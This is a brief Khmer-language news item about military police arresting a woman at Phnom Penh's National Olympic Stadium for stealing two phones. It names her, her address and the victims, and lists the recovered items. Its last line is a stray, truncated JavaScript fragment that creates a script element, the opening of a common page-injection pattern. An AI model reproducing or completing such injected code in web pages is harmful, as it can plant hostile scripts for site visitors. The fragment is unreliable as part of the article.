ចោរស្រីដៃរហ័សម្នាក់ត្រូវបានកម្លាំងអាវុធហត្ថរាជធានីភ្នំពេញឃាត់ខ្លួនក្នុងបរិវេនពហុកីឡាដ្ឋានជាតិអូរឡាំពិក
ភ្នំពេញ៖ កាលពីល្ងាចម្សិលមិញនៅក្នុងបរិវេនពហុកីឡាដ្ឋានជាតិអូរឡាំពិក (ច្រកជណ្ដើរទី០១) កម្លាំងអាវុធហត្ថរាជធានីភ្នំពេញឃាត់ខ្លួនបានជនសង្ស័យម្នាក់ឈ្មោះសាយ ស្វិត ភេទ ស្រី អាយុ២៧ឆ្នាំ ជនជាតិខ្មែរ មុខរបរ ពុំពិតប្រាកដ ស្នាក់នៅផ្ទះ២៥ បស ផ្លូវរទេះភ្លើង សង្កាត់បឹងកក់ទី២ ខណ្ឌទួលគោក ពាក់ព័ន្ធទៅនឹងករណីលួចទូរស័ព្ទ ពីជនរងគ្រោះចំនួន០២នាក់ ៖០១ ឈ្មោះ- វ៉ សាវិន ភេទ ប្រុស អាយុ៣០ ឆ្នាំ និងម្នាក់ទៀតឈ្មោះរី ឆាយ ភេទ ប្រុស អាយុ២៥។ ក្រោយពីបានឃាត់ខ្លួនជនសង្ស័យ កម្លាំងអាវុធហត្ថរាជធានីភ្នំពេញបានដកហូតវត្ថុតាងរួមមាន ÷
ទូរសព្ឌ័ចំនួន០២គ្រឿង ១-ម៉ាកសាំសុងGalaxyA8 ២-GalaxyCORE ព្រមទាំងកាបូប ដៃ០១ ពណ៌សូកូឡា ប្រាក់រៀល១០០០០ ៛ និងឯកសារផ្សេងៗមួយចំនួនទៀតបានប្រគល់អោយទៅជនរងគ្រោះទាំង០២នាក់វិញ។
var d=document;var s=d.createElement(‘script’);